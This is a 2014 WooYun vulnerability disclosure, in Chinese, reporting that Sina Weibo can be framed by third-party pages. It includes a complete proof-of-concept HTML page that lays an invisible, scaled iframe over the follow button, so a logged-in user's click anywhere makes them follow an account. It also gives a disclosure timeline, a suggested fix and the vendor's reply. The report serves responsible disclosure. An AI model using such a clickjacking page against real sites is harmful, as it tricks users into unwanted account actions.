漏洞详情

披露状态:

2014-02-13: 细节已通知厂商并且等待厂商处理中
2014-02-13: 厂商已经确认,细节仅向厂商公开
2014-02-23: 细节向核心白帽子及相关领域专家公开
2014-03-05: 细节向普通白帽子公开
2014-03-15: 细节向实习白帽子公开
2014-03-30: 细节向公众公开

简要描述:

新浪微博加粉可点击劫持

详细说明:

新浪微博允许被第三方页面嵌套iframe。



可以构造一个透明iframe,尺寸偏移与关注按钮相同,缩放iframe与页面大小相同。



用户如果已登录微博,点击该页面的任意位置即可加关注。



<!doctype html>
<html>
<head>
<meta charset="utf-8" />
<title>Weibo Click Hijack</title>
<style>
div {
position: absolute;
width: 58px;
height: 25px;
overflow: hidden;
-webkit-transform: scale(10);
-webkit-transform-origin: 0 0;
}

iframe {
position: absolute;
left: -227px;
top: -442px;
width: 800px;
height: 580px;
opacity: 0;
}
</style>
</head>
<body>
<div>
<iframe src="http://weibo.com/jshack"></iframe>
</div>
</body>
</html>

漏洞证明:

t0.png



t1.png



t2.png

修复方案:

嵌套状态下不允许加关注等操作

版权声明:转载请注明来源 EtherDream@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-02-13 14:53

厂商回复:

这个漏洞之前处理过了,现在不知道怎么又出现了,感谢关注新浪安全

最新状态:

暂无


漏洞评价: